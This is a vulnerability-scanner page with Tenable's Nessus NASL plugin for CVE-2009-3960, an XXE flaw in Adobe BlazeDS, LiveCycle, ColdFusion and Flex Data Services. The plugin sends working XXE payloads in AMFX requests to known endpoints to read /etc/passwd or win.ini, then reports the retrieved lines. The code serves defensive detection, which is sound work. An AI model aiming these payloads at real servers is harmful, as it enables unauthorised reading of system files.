4.3 Medium
CVSS2
Attack Vector
NETWORK
Attack Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
NONE
Availability Impact
NONE
AV:N/AC:M/Au:N/C:P/I:N/A:N
0.967 High
EPSS
Percentile
99.7%
The remote host appears to be running an Adobe product that is susceptible to XML External Entity (XXE) attacks. The installed version of the product fails to block the use of external XML entities while using the HTTPChannel to transport data in AMFX format. A remote, unauthenticated attacker could exploit this vulnerability to read arbitrary files from the remote system.
According to the Adobe advisory, Adobe BlazeDS, LiveCycle, LiveCycle Data Services, Flex Data Services and ColdFusion are known to be affected by this issue.
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
include('deprecated_nasl_level.inc');
include('compat.inc');
if (description)
{
script_id(44937);
script_version("1.28");
script_set_attribute(attribute:"plugin_modification_date", value:"2023/04/25");
script_cve_id("CVE-2009-3960");
script_bugtraq_id(38197);
script_xref(name:"EDB-ID", value:"11529");
script_xref(name:"CISA-KNOWN-EXPLOITED", value:"2022/09/07");
script_xref(name:"SECUNIA", value:"38543");
script_name(english:"Multiple Adobe Products XML External Entity (XXE) Injection (APSB10-05)");
script_set_attribute(attribute:"synopsis", value:
"The remote host is susceptible to XML External Entity (XXE)
attacks.");
script_set_attribute(attribute:"description", value:
"The remote host appears to be running an Adobe product that is
susceptible to XML External Entity (XXE) attacks. The installed
version of the product fails to block the use of external XML entities
while using the HTTPChannel to transport data in AMFX format. A
remote, unauthenticated attacker could exploit this vulnerability to
read arbitrary files from the remote system.
According to the Adobe advisory, Adobe BlazeDS, LiveCycle, LiveCycle
Data Services, Flex Data Services and ColdFusion are known to be
affected by this issue.");
# http://www.security-assessment.com/files/advisories/2010-02-22_Multiple_Adobe_Products-XML_External_Entity_and_XML_Injection.pdf
script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?6688a1e2");
script_set_attribute(attribute:"see_also", value:"https://seclists.org/bugtraq/2010/Feb/197");
script_set_attribute(attribute:"see_also", value:"https://www.adobe.com/support/security/bulletins/apsb10-05.html");
script_set_attribute(attribute:"solution", value:
"Apply the appropriate vendor-supplied patches.");
script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N");
script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
script_set_attribute(attribute:"cvss_score_source", value:"CVE-2009-3960");
script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
script_set_attribute(attribute:"exploit_available", value:"true");
script_set_attribute(attribute:"d2_elliot_name", value:"Adobe XML External Entity File Disclosure");
script_set_attribute(attribute:"exploit_framework_d2_elliot", value:"true");
script_set_attribute(attribute:"exploited_by_nessus", value:"true");
script_set_attribute(attribute:"exploit_framework_canvas", value:"true");
script_set_attribute(attribute:"canvas_package", value:"D2ExploitPack");
script_set_attribute(attribute:"vuln_publication_date", value:"2010/02/11");
script_set_attribute(attribute:"patch_publication_date", value:"2010/02/11");
script_set_attribute(attribute:"plugin_publication_date", value:"2010/03/01");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_set_attribute(attribute:"cpe", value:"cpe:/a:adobe:lifecycle");
script_set_attribute(attribute:"cpe", value:"cpe:/a:adobe:lifecycle_data_services");
script_set_attribute(attribute:"cpe", value:"cpe:/a:adobe:flex_data_services");
script_set_attribute(attribute:"cpe", value:"cpe:/a:adobe:coldfusion");
script_set_attribute(attribute:"cpe", value:"cpe:/a:adobe:blazeds");
script_set_attribute(attribute:"thorough_tests", value:"true");
script_end_attributes();
script_category(ACT_ATTACK);
script_family(english:"CGI abuses");
script_copyright(english:"This script is Copyright (C) 2010-2023 and is owned by Tenable, Inc. or an Affiliate thereof.");
script_dependencies("http_version.nasl", "os_fingerprint.nasl");
script_require_ports("Services/www", 80, 8400, 8500);
exit(0);
}
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("data_protection.inc");
port = get_http_port(default:80);
# Make a list of known HTTPChannel endpoints.
# Check for sample apps only if thorough_tests
# are enabled
if(thorough_tests)
{
if (get_port_transport(port) > ENCAPS_IP)
{
urls = make_list(
"/flex2gateway/http", # ColdFusion 9 (disabled by default)
"/flex2gateway/httpsecure", # ColdFusion 9 (disabled by default)
"/messagebroker/http",
"/messagebroker/httpsecure",
"/blazeds/messagebroker/http", # Blazeds 3.2
"/blazeds/messagebroker/httpsecure", #
"/samples/messagebroker/http", # Blazeds 3.2
"/samples/messagebroker/httpsecure", # Blazeds 3.2
"/lcds/messagebroker/http", # LCDS
"/lcds/messagebroker/httpsecure", # LCDS
"/lcds-samples/messagebroker/http", # LCDS
"/lcds-samples/messagebroker/httpsecure"); # LCDS
}
else
{
urls = make_list(
"/flex2gateway/http", # ColdFusion 9 (disabled by default)
"/messagebroker/http",
"/blazeds/messagebroker/http", # Blazeds 3.2
"/samples/messagebroker/http", # Blazeds 3.2
"/lcds/messagebroker/http", # LCDS
"/lcds-samples/messagebroker/http"); # LCDS
}
}
else
{
if (get_port_transport(port) > ENCAPS_IP)
{
# nb : Both endpoints (http/httpsecure) are vulnerable on
# encrypted ports.
urls = make_list(
"/flex2gateway/http", # ColdFusion 9 (disabled by default)
"/flex2gateway/httpsecure", # ColdFusion 9 (disabled by default)
"/messagebroker/http",
"/messagebroker/httpsecure", # Blazeds 3.2
"/blazeds/messagebroker/http", # Blazeds 3.2
"/blazeds/messagebroker/httpsecure",
"/lcds/messagebroker/http", # LCDS
"/lcds/messagebroker/httpsecure"); # LCDS
}
else
{
urls = make_list(
"/flex2gateway/http", # ColdFusion 9 (disabled by default)
"/messagebroker/http",
"/blazeds/messagebroker/http", # Blazeds 3.2
"/lcds/messagebroker/http"); # LCDS
}
}
os = get_kb_item("Host/OS");
if (os)
{
if ("Windows" >< os) injections = make_list(
'<!DOCTYPE foo [ <!ENTITY nessus SYSTEM "c:\\windows\\win.ini"> ]>',
'<!DOCTYPE foo [ <!ENTITY nessus SYSTEM "c:\\winnt\\win.ini"> ]>');
else injections = make_list(
'<!DOCTYPE foo [ <!ENTITY nessus SYSTEM "/etc/passwd"> ]>');
}
else injections = make_list(
'<!DOCTYPE foo [ <!ENTITY nessus SYSTEM "c:\\windows\\win.ini"> ]>',
'<!DOCTYPE foo [ <!ENTITY nessus SYSTEM "c:\\winnt\\win.ini"> ]>',
'<!DOCTYPE foo [ <!ENTITY nessus SYSTEM "/etc/passwd"> ]>');
injection_pats = make_array();
injection_pats['<!DOCTYPE foo [ <!ENTITY nessus SYSTEM "c:\\windows\\win.ini"> ]>'] = "\[[a-zA-Z\s]+\]|; for 16-bit app support";
injection_pats['<!DOCTYPE foo [ <!ENTITY nessus SYSTEM "c:\\winnt\\win.ini"> ]>'] = "\[[a-zA-Z\s]+\]|; for 16-bit app support";
injection_pats['<!DOCTYPE foo [ <!ENTITY nessus SYSTEM "/etc/passwd"> ]>'] = "root:.*:0:[01]:";
info = NULL;
foreach injection (injections)
{
foreach url (urls)
{
exploit = '<?xml version="1.0" encoding="utf-8"?>' + '\n' +
injection + '\n' +
'<amfx ver="3" xmlns="http://www.macromedia.com/2005/amfx">' + '\n' +
' <body>' + '\n' +
' <object type="flex.messaging.messages.CommandMessage">' + '\n' +
' <traits>' + '\n' +
' <string>body</string><string>clientId</string><string>correlationId</string>' + '\n' +
' <string>destination</string><string>headers</string><string>messageId</string>' + '\n' +
' <string>operation</string><string>timestamp</string><string>timeToLive</string>' + '\n' +
' </traits><object><traits />' + '\n' +
' </object>' + '\n' +
' <null /><string /><string />' + '\n' +
' <object>' + '\n' +
' <traits>' + '\n' +
' <string>DSId</string><string>DSMessagingVersion</string>' + '\n' +
' </traits>' + '\n' +
' <string>nil</string><int>1</int>' + '\n' +
' </object>' + '\n' +
' <string>&nessus;</string>' + '\n' +
'<int>5</int><int>0</int><int>0</int>' + '\n' +
' </object>' + '\n' +
' </body>' + '\n' +
'</amfx>';
res = http_send_recv3(
method:"POST",
item:url,
port:port,
add_headers: make_array("Content-Type", "application/x-amf"),
data:exploit,
exit_on_fail:TRUE);
match = egrep(pattern:injection_pats[injection], string:res[2]);
if (
res[2] &&
"<amfx" >< res[2] &&
(!empty_or_null(match))
)
{
req = http_last_sent_request();
output = NULL;
if ("win.ini" >< injection)
{
file = "win.ini";
}
else file = "/etc/passwd";
# Format output
pos = stridx(match, "null/><string>");
if (pos > 0 && !empty_or_null(pos))
{
output = substr(match, pos);
output = output - "null/><string>";
}
# Should never reach this, but just in case
if (empty_or_null(output))
output = extract_pattern_from_resp(string:res[2], pattern:'RE:'+injection_pats[injection]);
output = data_protection::redact_etc_passwd(output:output);
info += '\n' + 'HTTPChannel Endpoint : ' + url + '\n';
snip = crap(data:"-", length:30)+' snip '+ crap(data:"-", length:30);
info += '\n' +
'Nessus was able to exploit the issue to retrieve the contents of ' +
'\n' + "'" + file + "'" + ' using the following request :' +
'\n\n' +req +'\n\n' +
'This produced the following truncated output (limited to 10 lines) :' +
'\n' + snip +
'\n' + beginning_of_response2(resp:output, max_lines:10) +
'\n' + snip +
'\n';
}
if (!isnull(info)) break;
}
if (!isnull(info)) break;
}
if (!isnull(info))
{
if (report_verbosity > 0)
{
report = '\n' +
"Nessus found following vulnerable HTTPChannel endpoint : " + '\n' +
info + '\n';
security_warning(port:port, extra:report);
}
else
security_warning(port);
}
else exit(0, 'Nessus did not identify any affected endpoints on the webserver listening on port '+ port);
Vendor | Product | Version | CPE |
---|---|---|---|
adobe | lifecycle | cpe:/a:adobe:lifecycle | |
adobe | lifecycle_data_services | cpe:/a:adobe:lifecycle_data_services | |
adobe | flex_data_services | cpe:/a:adobe:flex_data_services | |
adobe | coldfusion | cpe:/a:adobe:coldfusion | |
adobe | blazeds | cpe:/a:adobe:blazeds |